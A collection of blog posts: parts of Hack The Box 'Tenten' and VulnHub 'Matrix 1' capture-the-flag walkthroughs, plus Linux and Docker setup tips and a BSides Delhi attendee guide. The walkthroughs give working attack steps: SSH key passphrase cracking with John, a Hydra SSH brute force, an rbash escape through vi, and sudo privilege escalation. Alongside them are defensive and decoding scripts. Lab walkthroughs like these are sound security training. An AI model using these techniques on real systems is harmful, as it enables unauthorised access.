Send the request to Intruder and follow the pictures below.

Under the Options tab --> Grep - Extract

In step 3, select <title>Job Application: Hello world! &#8211; Job Portal</title> and click OK, as shown in the image above.

Now notice the Intruder results:

The results contain a mixture of post names and the various file names that candidates uploaded as resumes.

The title HackerAccessGranted looks promising.
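The Intruder run above walks /index.php/jobs/apply/<id>/ through many ids from one client in a short time, and that pattern, many distinct ids from one address, is easy to surface in the web server's access log. The script below is an added example for this write-up, not part of the Tenten machine; the access log lines it reads are constructed in Apache combined format, and the client addresses are taken from this write-up's own VPN range.

```python
"""Spotting an id sweep like the Intruder run above in Apache access logs.

Added example, not part of the Tenten machine.  Intruder walked
/index.php/jobs/apply/<id>/ through many ids from one client in a short time;
that pattern, many distinct ids from one address, is easy to surface from the
access log.  The log lines below are constructed in Apache combined format.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
ID_PATH = re.compile(r"^/index\.php/jobs/apply/(?P<id>\d+)/?$")


def _line(ip, path, second, status=200):
    """Build one constructed combined-format log line."""
    return ('%s - - [22/May/2020:15:10:%02d -0400] "GET %s HTTP/1.1" %d 5120 "-" "Mozilla/5.0"'
            % (ip, second, path, status))


# Constructed sample: one client sweeps ids 1-15, another opens job 8 once.
SAMPLE_LOG = [_line("10.10.14.25", "/index.php/jobs/apply/%d/" % i, i) for i in range(1, 16)]
SAMPLE_LOG += [
    _line("10.10.14.7", "/index.php/jobs/apply/8/", 20),
    _line("10.10.14.7", "/index.php/2017/04/12/hello-world/", 21),
    _line("10.10.14.25", "/wp-login.php", 30, status=302),
]


def ids_per_client(lines):
    """Map client address -> set of distinct apply ids it requested."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        p = ID_PATH.match(m.group("path"))
        if p:
            seen[m.group("ip")].add(int(p.group("id")))
    return seen


def id_sweeps(lines, min_ids=10):
    """Clients that requested at least min_ids distinct ids: {ip: sorted ids}."""
    return {ip: sorted(ids) for ip, ids in ids_per_client(lines).items() if len(ids) >= min_ids}


if __name__ == "__main__":
    for ip, ids in id_sweeps(SAMPLE_LOG).items():
        print("%s requested %d distinct job ids (%d..%d)" % (ip, len(ids), ids[0], ids[-1]))
```

The threshold is deliberately a parameter: on a real job board a few ids per visitor are normal, so tune min_ids (and add a time window) against your own traffic before alerting on it. The underlying fix is an authorisation check on the apply page itself, so that a guessed id returns nothing the requester is not entitled to see.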

Note: WordPress populates the upload directory using the structure below:

Array
(
    [path] => C:\development\xampp\htdocs\example.com/wp-content/uploads/2012/04
    [url] => http://example.com/wp-content/uploads/2012/04
    [subdir] => /2012/04
    [basedir] => C:\~\example.com/wp-content/uploads
    [baseurl] => http://example.com/wp-content/uploads
    [error] => 
)

The example above is from Windows; forgive me if you are not a Windows fan.

The idea behind the example is to look at [url] and [subdir] to understand how WordPress stores files.

Let's try to access HackerAccessGranted and check what it is exactly, following the URL structure above.

Navigate to http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg and you will find the response below in the browser.

If you are wondering how I figured out the dates, it was a guess: it's a job application, and the dates were mentioned in the job post.

The image says ACCESS GRANTED, which means it has something good waiting for us.

Let's try to extract any information possible from the image. I use steghide for this work.

Save the image and run this command in the directory where you saved it:

steghide extract -sf HackerAccessGranted.jpg

It will ask for a passphrase; just press Enter.

You will find an id_rsa SSH private key extracted from the image.

So let's try to SSH in using the private key:

ssh -i id_rsa takis@10.10.10.10

Well, it asks for a passphrase, and obviously we don't have that. So the next thing that comes to mind is to use John the Ripper to brute force the passphrase.

We will need a script, ssh2john.py. It comes with Kali Linux.

To find the file, run the commands below:

updatedb
locate ssh2john.py
cp $(locate ssh2john.py) .

Now, we will create a hash from the key using it:

python ssh2john.py id_rsa > id_rsa.hash

Now, let's find and copy rockyou.txt.gz, our wordlist:

cp $(locate rockyou.txt) .

Now, unzip the file:

gunzip rockyou.txt.gz

It's time to use john with rockyou.txt to crack the SSH key passphrase:

john id_rsa.hash -wordlist=rockyou.txt

Run cp id_rsa ~/.ssh

cd ~ && cd .ssh

chmod 400 id_rsa

and now run ssh -i id_rsa takis@10.10.10.10 and use the passphrase superpassword, which we cracked by brute forcing id_rsa.
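Two things made that crack cheap: a passphrase that is in rockyou.txt, and the legacy PEM key format, which derives the cipher key from the passphrase with a single MD5 pass, so every guess costs almost nothing. The newer openssh-key-v1 container uses bcrypt with a tunable round count. The function below is an added example for this write-up, not part of the Tenten machine, and reports format, cipher and KDF for a private key file; both key texts it is exercised on are constructed fixtures with no real key material.

```python
"""How well is a stolen id_rsa protected?

Added example, not part of the Tenten write-up.  The key hidden in the image
was a legacy PEM key, and john recovered its passphrase from rockyou.txt.  Two
things made that cheap: a guessable passphrase, and the legacy format, which
derives the cipher key from the passphrase with a single MD5 pass.  The newer
'openssh-key-v1' container uses bcrypt with a tunable round count.  The
function below reports format, cipher and KDF for either kind of file.  Both
key texts used here are constructed fixtures with no real key material.
"""
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"
LEGACY_HEADERS = {
    "-----BEGIN RSA PRIVATE KEY-----",
    "-----BEGIN DSA PRIVATE KEY-----",
    "-----BEGIN EC PRIVATE KEY-----",
}


def _field(buf, off):
    """Read one SSH string (4-byte big-endian length, then bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def describe_key(pem_text):
    """Return {format, encrypted, cipher, kdf, rounds} for an OpenSSH private key file."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    header, body = lines[0], lines[1:-1]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        raw = base64.b64decode("".join(body))
        if not raw.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _field(raw, len(OPENSSH_MAGIC))
        kdf, off = _field(raw, off)
        kdfopts, off = _field(raw, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _field(kdfopts, 0)          # kdfoptions = string salt, uint32 rounds
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    if header in LEGACY_HEADERS:
        encrypted = any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in body)
        dek = next((l.split(":", 1)[1].strip() for l in body if l.startswith("DEK-Info:")), None)
        return {"format": "legacy-pem", "encrypted": encrypted,
                "cipher": dek.split(",")[0] if dek else "none",
                "kdf": "EVP_BytesToKey(MD5, 1 iteration)" if encrypted else "none",
                "rounds": 1 if encrypted else None}
    raise ValueError("not an OpenSSH private key")


def make_openssh_v1_fixture(cipher, kdf, rounds=0):
    """Constructed header-only openssh-key-v1 blob; enough for describe_key, not a usable key."""
    kdfopts = b""
    if kdf == "bcrypt":
        salt = b"\x00" * 16
        kdfopts = struct.pack(">I", len(salt)) + salt + struct.pack(">I", rounds)
    raw = OPENSSH_MAGIC
    for field in (cipher.encode(), kdf.encode(), kdfopts):
        raw += struct.pack(">I", len(field)) + field
    raw += struct.pack(">I", 1)   # number of keys; the key blobs themselves are omitted
    b64 = base64.b64encode(raw).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % b64


# Constructed legacy header in the shape ssh-keygen wrote before the new format.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

KEYBODYOMITTEDCONSTRUCTEDFIXTURE
-----END RSA PRIVATE KEY-----
"""


if __name__ == "__main__":
    print(describe_key(LEGACY_ENCRYPTED))
    print(describe_key(make_openssh_v1_fixture("aes256-ctr", "bcrypt", 100)))
    print(describe_key(make_openssh_v1_fixture("none", "none")))
```

A key that reports legacy-pem with 1 round is the one to re-protect: ssh-keygen -p -o -a 100 -f id_rsa rewrites it in the openssh-v1 format with 100 bcrypt rounds, and a passphrase that is not in a wordlist does the rest.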

Hence user owned.

USER OWNED

Run ls -la and read your flag file user.txt.

cd /root

The next thing I usually do for privilege escalation is to check which commands the current user can run as root. To check this, type:

sudo -l

So I can run /bin/fuckin as root without any password.

Note: a brief search on what the /bin directory does in Linux:

The /bin Directory
/bin is a standard subdirectory of the root directory in Unix-like operating systems that contains the executable (i.e., ready to run) programs that must be available in order to attain minimal functionality for the purposes of booting (i.e., starting) and repairing a system

Follow the URL https://refspecs.linuxfoundation.org/FHS_3.0/fhs/ch03s04.html to check which commands you can run if you have /bin access.

The list at the URL above says that we can run sh:

sh POSIX compatible command shell

So we run sudo /bin/fuckin sh

And we become root. You can check this with the command id, as shown in the picture above. Hence the machine is pwned.

ROOT PWND

To complete the ritual, find root.txt and submit the flag.

Now run cd /root && ls

Linux Things : UBER-COOL things I Learned this Year(2k19)

Linux things You must know

Some uber-cool Linux things I learned this year


i3wm

Starting with i3wm. I know it's not a new thing in the open source world, but I still see many people struggling with their task management, so here we start with the i3 window manager.

Platform Availability:

Available for various Linux sweet flavors.


Stable Version: [Click here]
Download Link : [Click here]


or install it using the CLI:

sudo apt install i3

Setting up i3wm

As of now, I won't be listing the steps I used to set up my i3wm, but I will share resources which are really good to start with; believe me, they are really good, and I started with these resources only. I will also be sharing my own complete layman's documentation on setting up i3wm.

Resource 1 (Code Cast): Watch here

Notes:
1. Watch each step carefully; I would recommend having patience and trying the steps shown in the tutorial again and again in case you find yourself stuck somewhere.
2. Don't copy and paste someone else's i3 dotfiles, as it might mess up your entire Linux environment: different dependencies or tools may have been installed when those dotfiles were written.

Resource 2(i3wm docs): Read here

Resource 3(Docs Links): Read here
Read here

Running your application Inside Linux Containers

We all use applications, tools, or say software, on our Linux OS, but what if we ran everything inside Linux containers, which provide isolation, save memory and a lot of other things?

If you don't get it, think of running each application virtually, or say in virtual machines. The only difference is that it will be Linux container technology instead of virtual machines. If you want to learn the difference between container technology and virtual machines, I recommend reading my GitBook page, where I have explained it with a pictorial example.

Click me

Okay, I hope you read it and understand what we are dealing with now.

Motivation: Jessie Frazelle - Dockercon SF 2015

Well, that's true: I got motivated to run everything inside containers right after I saw Jessie Frazelle giving her talk Container Hacks and Fun Images.

How To:

Wireshark in Container

Steps:

First of all we need to write docker functions which, when called, run a container. Either you can write your own, or you may use Jessie Frazelle's GitHub repo, where she has created functions for different software and services in her .dockerfunc file.

Clone the repo (Clone) and then move .dockerfunc to your home directory.
Change directory to the cloned directory, which in this case will be dotfiles:

mv .dockerfunc /home/${USER}

It will move .dockerfunc to the logged-in user's home directory.

Now open the Bash startup file, .bashrc:

cd ~
nano .bashrc

and paste the following code at the end of the .bashrc file, before the unset file line.

# Source ~/.dockerfunc if it exists and is readable.  A single name must be
# written without braces: Bash only brace-expands lists of two or more names,
# so ~/.{dockerfunc} would be looked up literally and never sourced.
for file in ~/.dockerfunc; do
	if [[ -r "$file" ]] && [[ -f "$file" ]]; then
		source "$file"
	fi
done

Now try to run a container, for example wireshark or any other software or service defined in the .dockerfunc file. Note that sometimes it gives an error about an incorrect username and password; in that case just log in to Docker again from your CLI:

docker login

Note: the first time you run any service, it will download the container image locally so that it can be stored in the local image repository for later use.

Every time you run a new service, it will fetch images from the jess Docker repo. You may also download all the Dockerfiles written by Jessie Frazelle, build the images again and push them to your own Docker Hub repo so that the functions pull from your repo.

But I would recommend contributing to Jessie Frazelle's repo.

Download the Dockerfiles from here

You are all set; now just run any application or service written inside .dockerfunc. Also contribute to Jessie Frazelle's repo to add docker functions for tools and services which should be run in a container and are missing from the .dockerfunc file.

Linux Commands

Use aliases to make things short and to save time.

Example:

alias h="history"
alias update="sudo apt update"

Now you can write all the short-form names, or say aliases, for the commands you want and save them inside the .bashrc file.

You might also take a look at Jessie Frazelle's aliases file for better examples and usage.

Alias dotfile

Create a file in your home directory named .aliases:

cd ~
nano .aliases

and paste all the content from this GitHub file.

Now open the .bashrc file and at the end add aliases to the for loop we created while playing with Linux containers:

for file in ~/.{dockerfunc,aliases}; do
if [[ -r "$file" ]] && [[ -f "$file" ]]; then
	source "$file"
fi
done

You are all set to use aliases for commands which you feel take your time.

zsh

It is an open source project, or say framework, to add themes to your terminal and increase its capabilities.

Some cool themes of this framework are:

Ohmyz.sh

To install it, you may follow the resources mentioned below.

Resource 1: Install Ohmyzsh

Resource 2: Installation Guide

Note

It does not end here; I have so many other things on my plate which I will keep adding later on.


BSides Delhi - The Survival Guide

BSides Delhi 2k19 | SecurityBsides | BSidesDelhi Conference

About BSides Delhi

The cyber security industry is now bigger and more active than ever before, so a lot of activities and conferences are held every year. Here I am introducing you all to one of the major conferences, BSides Delhi. Security BSides is a community-driven framework for building events by and for information security community members. These events are already happening in major cities all over the world! They are responsible for organizing an independent BSides-approved event for Delhi, India.

It is a volunteer-organized event (it has no paid staff), and they truly strive to keep information accessible for everyone.

I am Volunteering | YEAHHH!!!

So, I am Priyam Singh and I am volunteering this year at BSides Delhi 2k19. I really thank the BSides Delhi #team for giving me such an incredible opportunity. I am really glad and excited to attend the conference on 11th October 2019. The event venue is Vivanta New Delhi, Dwarka.

Insights About Conference

The event is going to start with a keynote talk by Leigh-Anne Galloway (Security Researcher) and Adam Laurie (Global Associate Partner and Lead Hardware Hacker, IBM X-Force Red), then technical talks, workshops, village speakers, a panel discussion and finally the sub-events.

As it is the first conference I am attending, I hope it turns out to be overwhelming: being around some of the best security researchers from India and abroad, being able to meet them and get their valuable advice. Nothing short of a goldmine for the many who are getting started and trying to make a career in security. If you are eager to know about these security researchers, follow the link below.

Speakers

For the last two years I have heard a lot from my friends who have already been part of this conference, about what activities are held and organised and what one can learn at such conferences.

Now a few things I would like to mention if it's your first time, so that you don't miss anything and get the most out of the conference.

Important Key Notes
* Don't forget your conference pass.
* Come early, grab your SWAG and ID, and become familiar with the environment.
* Prepare a list of all the talks and workshops you are interested in attending a day before the conference.
* During talks, make notes on the important points.
* Ask the speaker questions at the end of the talk or during the Q&A session, and try to have an interactive session.
* Try to interact with other attendees too.
* Ask volunteers if you need any help; they are the right people to guide you.
* Apart from the talks, they might have organised a special party in the evening; surely attend it if you are invited.
* The party is another important thing not to miss at the conference.
* Interact with people and introduce yourself; also try to grow your network and share social profiles, which might be useful for you later.

Apart from this, you might catch a glimpse of the beauty of Delhi.

  • You can visit several nearby historical sites in one go, so pick something of your choice. Places like:

Red Fort, Jama Masjid, Tughlaqabad Fort, Qutub Minar, Mehrauli Archaeological Park, Humayun’s Tomb, Hauz Khas Fort, Lodhi Garden, Lotus Temple and Jantar Mantar

  • If you really want to pick one, try Humayun’s Tomb or the Qutub Complex.
  • Also go to Rashtrapati Bhavan, Lutyens’ Delhi and India Gate.
  • Delhi is also the food capital of India, so go and taste its many different delicious dishes.

  • Despite being a hub of world-class shopping malls, the true Delhi lies in its bazaars. Lajpat Nagar, Sarojini Nagar, Kamala Nagar Market, Janpath and Karol Bagh are some of the most happening shopping destinations.

This is all from me; do not forget to meet me at the conference. I will be part of the volunteering team this time. Find me at @DevOpsgirl_ or on LinkedIn.

I hope this event is a great success and that everyone who comes learns and experiences many new things of immense importance.

Matrix 1

Description

Matrix is an intermediate-level boot2root challenge. The OVA has been tested on both VMware and VirtualBox.


Flags: Goal is to get root and read `/root/flag.txt`
Networking : DHCP: Enabled IP Address: automatically assigned

Download link: [Link 1] || [Torrent]
Download Size : 552 MB
For more details: Visit [Vulnhub.com](https://www.vulnhub.com/entry/matrix-1,259/)

Walkthrough

First we need to discover the IP address of the target machine so that we can interact with it. We have no login credentials for the Matrix machine, so everything starts from the network.

For IP discovery: if you have the Blue Team Field Manual (BTFM), open it and under Scanning and Vulnerability you will find the commands below.

You can discover hosts using netdiscover or nmap.

Open your terminal

$ netdiscover

or

$ nmap -sn -PE 192.168.1.0/24    

nmap image

If you want just the addresses, filter the output:

$ nmap -sn -PE 192.168.1.0/24 | grep scan | cut -d " " -f 5

Here

-sn: ping scan, disables port scanning
-PE: use ICMP echo requests for host discovery (raw ICMP needs root, so run nmap with sudo; otherwise nmap silently falls back to TCP probes)
grep scan keeps only the "Nmap scan report for <IP>" lines, and cut -d " " -f 5 prints the fifth space-separated field of each, the IP address
See the manual pages for grep and cut, for example: $ man grep

Now we have the IP: 192.168.1.38 in my lab.
Next, the BTFM book lists commands to scan and show open ports, determine the open services, and scan TCP and UDP ports. Let's combine them, be verbose, and save the output to a file, matrix_nmap.txt (this command covers TCP only; a UDP scan would need -sU):

$ nmap  -T3 -A -v -oN matrix_nmap.txt 192.168.1.38

Looking at the output, we have 3 open ports:

port 22 SSH
port 80 http
port 31337 http

We have 2 http ports, so let's explore them in a browser.

Starting with port 80

After opening it in a browser, you get a page saying "Follow the white rabbit".

And yes, there is a rabbit at the end of the page; I have highlighted it. You know what comes next: inspect the element and you get this.

We have port 31337 as a hint.

Lets open it in browser that is http://192.168.1.38:31337

Again this page tells something about Cypher, but if you read the quote carefully it ends with "Ignorance is bliss". Be careful: don't start decoding the quote itself and get trapped in a rabbit hole.

Act normal and check the page source.

You will already have figured out that the interesting string is base64 encoded. Don't overthink it; decode it with whatever tool or website you want.

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

For most decoding or encoding I use string-functions.

We get the decoded string as

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

So some text is echoed and saved into a file named Cypher.matrix. But what does that have to do with this machine? We have not yet found any field where we can pass input.

Why not try requesting that file by URL?

    http://192.168.1.38:31337/Cypher.matrix

Once you type this into the URL bar, it will ask you to save a file named Cypher.matrix.

Save the file and open it in your terminal with your favourite editor.

You will see something really weird, but after some time on Google you will find that this is the Brainfuck programming language. Decode it using an online interpreter (if one refuses to decode it, try another browser). Once decoded, you will find the text below.

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password
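
As an added example (my own code, not part of the original walkthrough), the Python script below does both decoding steps offline: it decodes the base64 string copied from the page source above, and it implements a small Brainfuck interpreter so you do not depend on a web decoder for the Cypher.matrix file. The HELLO program is the well-known Wikipedia "Hello World!" and is only there to sanity-check the interpreter; bf_encode is a test helper. Function names are mine.

```python
import base64
import sys
from typing import Dict, List

# The base64 string found in the port-31337 page source, copied from the walkthrough above.
PAGE_B64 = (
    "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywg"
    "aXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg="
)

# Wikipedia's "Hello World!" Brainfuck program, used only to sanity-check the interpreter.
HELLO = (
    "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++..+++.>>."
    "<-.<.+++.------.--------.>>+.>++."
)


def decode_page_hint(blob: str) -> str:
    """Decode the base64 hint; validate=True rejects stray characters instead of dropping them silently."""
    return base64.b64decode(blob, validate=True).decode()


def _match_brackets(program: str) -> Dict[int, int]:
    """Map every '[' to its ']' and back, failing loudly on an unbalanced program."""
    stack: List[int] = []
    jumps: Dict[int, int] = {}
    for i, op in enumerate(program):
        if op == "[":
            stack.append(i)
        elif op == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return jumps


def bf_run(program: str, tape_size: int = 30000) -> str:
    """Interpret a Brainfuck program (no ',' input is needed for Cypher.matrix) and return its output."""
    jumps = _match_brackets(program)
    tape = bytearray(tape_size)  # 8-bit cells that wrap, like the common reference implementations
    ptr = pc = 0
    out: List[str] = []
    while pc < len(program):
        op = program[pc]
        if op == ">":
            ptr += 1
        elif op == "<":
            ptr -= 1
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(chr(tape[ptr]))
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        # any other character is a comment and is skipped
        if not 0 <= ptr < tape_size:
            raise IndexError(f"tape pointer left the tape at offset {pc}")
        pc += 1
    return "".join(out)


def bf_encode(text: str) -> str:
    """Naive encoder for ASCII text (one cell, reset after each character), for round-trip tests."""
    return "".join("+" * ord(c) + ".[-]" for c in text)


if __name__ == "__main__":
    print(decode_page_hint(PAGE_B64))
    if len(sys.argv) > 1:  # usage: python3 decode.py Cypher.matrix
        with open(sys.argv[1]) as fh:
            print(bf_run(fh.read()), end="")
    else:
        print(bf_run(HELLO), end="")
```

Pass the downloaded file as the first argument to print the hidden message. A program that walks off the tape raises instead of silently corrupting memory, which is the behaviour you want when interpreting untrusted input from a target.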

After reading the decoded text, we have

Username: guest Password: k1ll0rXX

Since the author forgot the last two characters, we can generate a wordlist from the mask k1ll0r?a?a, where ?a stands for any printable ASCII character (95 candidates per position, so 95 x 95 = 9025 passwords).

You may use any tool to generate the wordlist, like Crunch or mp64.

Here we will be using mp64, which is maskprocessor (mp):

$ mp64 -o matrix_wordlist.txt 'k1ll0r?a?a'

Note: in a shell like zsh, an unquoted ? is treated as a filename wildcard and the command fails with "no matches found". Quote the mask as shown above, or switch to your default shell.
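
Added example, not the page's own code: a minimal maskprocessor in Python that expands hashcat-style masks (?l ?u ?d ?s ?a, with ?? for a literal question mark), so you can see exactly what mp64 -o matrix_wordlist.txt k1ll0r?a?a produces and how large the keyspace is before pointing Hydra at SSH. Function names are mine; the charsets follow hashcat's definitions.

```python
import itertools
import string
from typing import Iterator, List

# Built-in charsets as used by hashcat and maskprocessor; ?a is everything printable (95 chars).
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]


def parse_mask(mask: str) -> List[str]:
    """Turn 'k1ll0r?a?a' into one alphabet per output position; '??' means a literal '?'."""
    positions: List[str] = []
    i = 0
    while i < len(mask):
        ch = mask[i]
        if ch != "?":
            positions.append(ch)
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        sel = mask[i + 1]
        if sel == "?":
            positions.append("?")
        elif sel in CHARSETS:
            positions.append(CHARSETS[sel])
        else:
            raise ValueError(f"unknown charset ?{sel}")
        i += 2
    return positions


def keyspace(mask: str) -> int:
    """Number of candidates the mask expands to; check this before starting a network brute force."""
    n = 1
    for alphabet in parse_mask(mask):
        n *= len(alphabet)
    return n


def expand_mask(mask: str) -> Iterator[str]:
    """Yield every candidate in odometer order (the rightmost position changes fastest)."""
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def write_wordlist(mask: str, path: str) -> int:
    """Equivalent of 'mp64 -o path mask'; returns the number of lines written."""
    count = 0
    with open(path, "w") as fh:
        for candidate in expand_mask(mask):
            fh.write(candidate + "\n")
            count += 1
    return count


if __name__ == "__main__":
    mask = "k1ll0r?a?a"
    print(f"{mask}: {keyspace(mask)} candidates")
    print("written:", write_wordlist(mask, "matrix_wordlist.txt"))
```

The keyspace function is the number that matters operationally: 9025 SSH login attempts is feasible, whereas one more ?a position (857,375) is not something you want to run against a live service.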

Now we have the list and need to brute-force it against the Matrix machine. We will use Hydra to try each candidate over SSH as guest. If Hydra reports connection errors, lower the number of parallel tasks with -t 4, since SSH servers cap concurrent unauthenticated connections.

$ hydra -l guest -P matrix_wordlist.txt ssh://192.168.1.38

Hydra reports the valid password k1ll0r7n, so log in over SSH with it:

$ ssh guest@192.168.1.38
USER OWNED

Finally we are in, but wait: I am not able to execute any commands. This means it is a restricted shell, which is used to confine users to a fixed set of commands.

But don't worry, there is always a solution. Let's run the export command without arguments, which lists the exported environment variables of the current shell.

$ export

Here we can see that our shell is /bin/rbash, the restricted bash shell, and that the PATH environment variable is /home/guest/prog, so only programs in that directory can be run by name.

rbash still allows shell builtins such as echo, and the shell itself expands wildcards, so echo /* lists the entries of a directory without needing ls.

So I tried echo /home/guest/* and found the prog directory; exploring further gives the following.

$ echo /home/guest/prog/*

So now we know that we have the vi/vim editor available. Powerful editors like vi can execute commands, and therefore can spawn a shell.

In vi, commands are entered after a colon: :! runs a shell command, and :wq! writes and quits.

To get an unrestricted shell we just need to run /bin/bash; rbash restrictions apply to the rbash process only, not to the new process it starts.

So let's open a file in vi and run the command :!/bin/bash.

In the image above, I am running :! followed by /bin/bash.

Now when you run ls, you will see that it works. We have escaped the restricted shell rbash and can execute the commands we want. So let's finally look at what we have here.

Let's try to switch to root using sudo su or su; you will see the error command not found. This is because the new bash inherited the restricted PATH (/home/guest/prog), where su does not live. Unlike rbash, the escaped shell lets us change PATH with export:

$ export PATH=/usr/bin:/bin

Copy and paste the above command, then check the variable with export again.
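
Added example (my code, not from the walkthrough) that reproduces the rbash behaviour above on your own machine using bash -r, which is what /bin/rbash is: it shows which operations the restricted shell refuses, that a directory can still be listed with echo and a glob, and that a child bash started from inside it, which is exactly what vi's :!/bin/bash does, is not restricted and can set PATH again. It needs bash on the machine running it; function names are mine and the scratch files are constructed.

```python
import os
import shlex
import subprocess
import tempfile
from typing import List, Tuple


def run_restricted(command: str) -> Tuple[int, str, str]:
    """Run one command line inside a restricted bash (bash -r is how /bin/rbash is implemented).

    Returns (exit status, stdout, stderr). PATH is inherited from this process, so unlike the
    Matrix box, bash itself is findable by name; that is the only difference that matters below.
    """
    proc = subprocess.run(["bash", "-r", "-c", command], capture_output=True, text=True)
    return proc.returncode, proc.stdout, proc.stderr


def is_blocked(command: str) -> bool:
    """True when the restricted shell refuses the command outright."""
    rc, _, err = run_restricted(command)
    return rc != 0 and ("restricted" in err or "readonly" in err)


def list_dir_via_echo(directory: str) -> List[str]:
    """What 'echo /home/guest/prog/*' does: the shell expands the glob, so no ls binary is needed."""
    rc, out, _ = run_restricted(f"echo {shlex.quote(directory)}/*")
    return out.split() if rc == 0 else []


def demo_listing(names=("vi", "vim")) -> List[str]:
    """Create a scratch directory with the given (constructed, empty) files and list it from rbash."""
    with tempfile.TemporaryDirectory() as d:
        for name in names:
            open(os.path.join(d, name), "w").close()
        return sorted(os.path.basename(p) for p in list_dir_via_echo(d))


def child_shell_escapes() -> bool:
    """Restrictions belong to the rbash process, not the environment: a child bash is unrestricted.

    vi's :!/bin/bash relies on exactly this; here the child is simply started from the command line.
    """
    rc, out, _ = run_restricted('bash -c "cd / && pwd"')
    return rc == 0 and out.strip() == "/"


def child_can_set_path(new_path: str = "/usr/bin:/bin") -> bool:
    """PATH is read-only inside rbash, but the escaped child shell can export it again."""
    rc, out, _ = run_restricted(f"bash -c 'export PATH={new_path}; echo \"$PATH\"'")
    return rc == 0 and out.strip() == new_path


if __name__ == "__main__":
    for cmd in ("cd /", "/bin/ls", "PATH=/usr/bin", "echo hi > /tmp/rbash_demo_out", "echo hello"):
        print(f"{cmd!r:32} blocked={is_blocked(cmd)}")
    print("glob listing from rbash:", demo_listing())
    print("child bash escapes:", child_shell_escapes())
    print("child bash can set PATH:", child_can_set_path())
```

The four refusals (cd, a command name containing /, assigning PATH, output redirection) are the standard rbash rules; the lesson of the last two functions is that rbash is only as strong as the programs it lets you run, and any program that can spawn a process (vi, less, find, a scripting interpreter) is a way out.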

Now we can switch user. The root cause here is password reuse: root shares the guest password.

Use the same password we used for the guest account. It worked for me (k1ll0r7n).

R00T OWNED

Now, in the /root directory, you will find the flag.

Docker Installation

Docker | Install | EC2 Ubuntu Docker Install

How to install Docker | Adding local user to EC2 ubuntu Instance | Adding user to Sudoers file


Docker

Docker is an open-source project that automates the deployment of software applications inside containers by providing an additional layer of abstraction and automation over OS-level virtualization on Linux.

In simple terms, Docker is a tool that lets developers, sysadmins and others deploy applications in isolated environments (called containers in the Docker world) that run on top of, and share the kernel of, the host operating system.

For more information, read Docker Docs

Pre-requisites
* Ubuntu 18.04+ / AWS EC2 Ubuntu Instance

If you are on an EC2 Ubuntu instance, let's first create a local user and give it SSH access; to avoid typing the user's password again and again, we will also add a sudoers entry for it. If you are not on AWS EC2, skip ahead to adding the user to sudoers.

Procedure
  • Log in to your EC2 Ubuntu instance using your private key.
$ ssh -i "myprivatekey.pem" ubuntu@public-dns.compute.amazonaws.com

Once you are in, let's start by creating a user and assigning privileges to it. In my case, I am creating a user named ninja:

$ sudo adduser ninja --disabled-password

--disabled-password creates the account without a password, so it can only be reached with an SSH key (or with sudo su from a privileged account). If you want to create the user with a password instead, use:

$ sudo adduser ninja 

Now let's switch to user ninja:

$ sudo su - ninja

Now it's time to add an SSH public key to the user account.

  • Start by creating the .ssh directory
$ mkdir .ssh 
  • Give the owner read, write and execute permission and everyone else nothing (700); sshd ignores keys in a directory that others can write to
$ chmod 700 .ssh
  • Create the authorized_keys file for ninja
$ touch .ssh/authorized_keys
  • Give the owner read and write permission only (600)
$ chmod 600 .ssh/authorized_keys

Open authorized_keys in your favourite editor and paste the public key of the key pair into it.

Remember the key pair you downloaded while creating the instance, the one you used to log in over SSH? This guide reuses that key for the new user. A separate key pair per user (generated with ssh-keygen on your workstation) is the better practice, because it lets you revoke ninja's access without touching the ubuntu account, but the steps below are the same either way.

To extract the public key from the private key, run the command below on your own system, where you downloaded the key pair:

$ ssh-keygen -y -f myprivatekey.pem

Copy the output and paste it into the authorized_keys file.

